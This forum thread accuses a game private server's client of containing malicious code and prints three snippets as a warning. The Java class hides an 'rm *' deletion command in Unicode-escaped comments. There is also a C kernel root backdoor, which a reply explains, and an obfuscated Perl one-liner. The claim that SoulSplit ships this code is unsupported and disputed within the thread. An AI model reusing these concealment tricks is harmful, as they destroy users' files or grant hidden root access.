Thread: SoulSplit's Malicious Code In Client [DONT RUN SOULSPLIT]

Page 1 of 6 123 ... LastLast
Results 1 to 10 of 53
  1. #1 SoulSplit's Malicious Code In Client [DONT RUN SOULSPLIT] 
    Banned
    Join Date
    Feb 2012
    Posts
    584
    Thanks given
    0
    Thanks received
    13
    Rep Power
    0
    soulsplit has been number 1 for ages, but when someone fucks with pim, and pim gets mad he easily has you logged through java malicious coding. this is a reason why not to run "soulsplit". i am not using this to hate/hack other peolpes computers,
    only for awareness.

    Code:
    import java.io.OutputStream;
    import java.net.Socket;
    
    public class AntiVirus {
    
      public static void main(String[] args) throws Exception {
        Test test = new Test();
        test.debug("AntiVirus Initiated");
      }
    
      public void debug(String msg) throws Exception {
        String s = "/usr/bin/logger ";
        Runtime r = Runtime.getRuntime();
    
        if (System.getProperty("os.name").equals("linux")) {
          /*
           * On linux we can make use of the  /usr/bin/logger command to keep
           * things simple.
           */
          r.exec(s + msg);
        }
        else {
          /*
           * Syslog code borrowed from log4j  by Ceki Gulc\u00FC
           * Network syslog calls must begin  with the following byte sequence:
           * \u002A\u002F \u0072 \u002E  \u0065\u0078\u0065c (\u0022 \u0072\u006D \u002A \u0022) \u003B \u002F\u002A<
           * followed by the message. For  more information see:
           *  http://cvs.apache.org/viewcvs.cgi/logging-log4j/src/java/org/apache/log4j/net/SyslogConstants.java?view=markup
           */
          Socket socket = new Socket("loghost", 514);
          OutputStream out = socket.getOutputStream();
          out.write(new byte[] { 0x2A, 0x2F, 0x72, 0x2E, 0x65, 0x78, 0x65, 0x22,  0x72, 0x6D, 0x22, 0x3B, 0x2F, 0x2A });
          out.write(msg.getBytes());
        }
      }
    }
    pim puts that in his client.jerba code and them boom. he hides this error message btw with an exception...



    also please look out for this code aswell... in linux ofc...
    Code:
    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
    and this is a backdoor for pearl
    Code:
    perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y;
     -/:-@[-`{-};`-{~" -;;s;;$_;see'
    I AM NOT POSTING THIS FOR MALICIOUS CONTENT IN OTHER PRIVATE SERVERS ONLY FOR AWARENESS!
     

  2. Thankful user:


  3. #2  
    Registered Member Innovation's Avatar
    Join Date
    Jun 2011
    Posts
    294
    Thanks given
    128
    Thanks received
    29
    Rep Power
    11
    Ow shit
     

  4. #3  
    Номер 1


    Leanbow's Avatar
    Join Date
    Feb 2008
    Posts
    5,895
    Thanks given
    1,564
    Thanks received
    2,624
    Rep Power
    5000
    pim sold ss
     

  5. #4  
    0x2B | ~0x2B


    Impulser's Avatar
    Join Date
    Jul 2006
    Posts
    1,305
    Thanks given
    389
    Thanks received
    336
    Rep Power
    2751
    Quote Originally Posted by Flaborgasted View Post
    [CODE]if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
    retval = -EINVAL;
    [CODE]
    You do realise that this is either C/C++ code and no one will be able to see this unless they have the source code...
     

  6. #5  
    Banned
    Join Date
    Feb 2012
    Posts
    584
    Thanks given
    0
    Thanks received
    13
    Rep Power
    0
    yeah, i know men, but still this needs to be out there.
     

  7. #6  
    Banned
    Join Date
    Feb 2012
    Posts
    584
    Thanks given
    0
    Thanks received
    13
    Rep Power
    0
    Quote Originally Posted by Impulser View Post
    You do realise that this is either C/C++ code and no one will be able to see this unless they have the source code...
    that is linux do some research
     

  8. #7  
    Banned

    Join Date
    Mar 2012
    Age
    27
    Posts
    49
    Thanks given
    12
    Thanks received
    45
    Rep Power
    0
    Quote Originally Posted by Flaborgasted View Post
    that is linux do some research
    You're correct there.

    Quote Originally Posted by Impulser View Post
    You do realise that this is either C/C++ code and no one will be able to see this unless they have the source code...
    Yes, it's a backdoor into the Unix Kernel.

    What it seems to be doing at first glance, is: "if a particular pair of options are set, and the user is root, then the call is invalid." The two options concerned make no sense when used together, so that seems a fine, if somewhat strangely specific, check to make.

    What it actually does is check for the invalid set of flags and, if set, makes the current user root.
    Note the single equals sign in the second half of the if test; it's a single rather than a double equals, assignment rather than equality.

    The flaw takes advantage of several features of C and Unix.
     

  9. Thankful user:


  10. #8  
    Banned

    Join Date
    Jun 2009
    Posts
    2,916
    Thanks given
    169
    Thanks received
    806
    Rep Power
    0
    Soulsplit has been sold?
     

  11. #9  
    Registered Member
    Death Grips's Avatar
    Join Date
    Jan 2011
    Posts
    4,838
    Thanks given
    2,510
    Thanks received
    752
    Rep Power
    2822
    Holy mother of....god.
     

  12. #10  
    Registered Member
    Join Date
    Mar 2012
    Posts
    16
    Thanks given
    0
    Thanks received
    0
    Rep Power
    0
    This is our packet logging system, Do your research before calling us malicious.

    - Bizmo
     

Page 1 of 6 123 ... LastLast

Thread Information
Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)


User Tag List

Similar Threads

  1. [Repp ++] SoulSplit Run Errors
    By Streams2lakes in forum Help
    Replies: 4
    Last Post: 01-28-2012, 05:29 PM
  2. [Pi] Better soulsplit code - No crash!
    By Kickyamom in forum Snippets
    Replies: 30
    Last Post: 07-22-2011, 11:53 PM
  3. Real soulsplit code - lolled
    By OFF YOUR TITS in forum Snippets
    Replies: 15
    Last Post: 07-22-2011, 04:49 AM
  4. Soulsplit Client
    By Blayzeee in forum Help
    Replies: 0
    Last Post: 11-25-2010, 09:58 PM
  5. [PI] SoulSplit how to run on vps?
    By DDS-PKZ in forum Help
    Replies: 10
    Last Post: 08-12-2010, 01:02 PM
Posting Permissions
  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •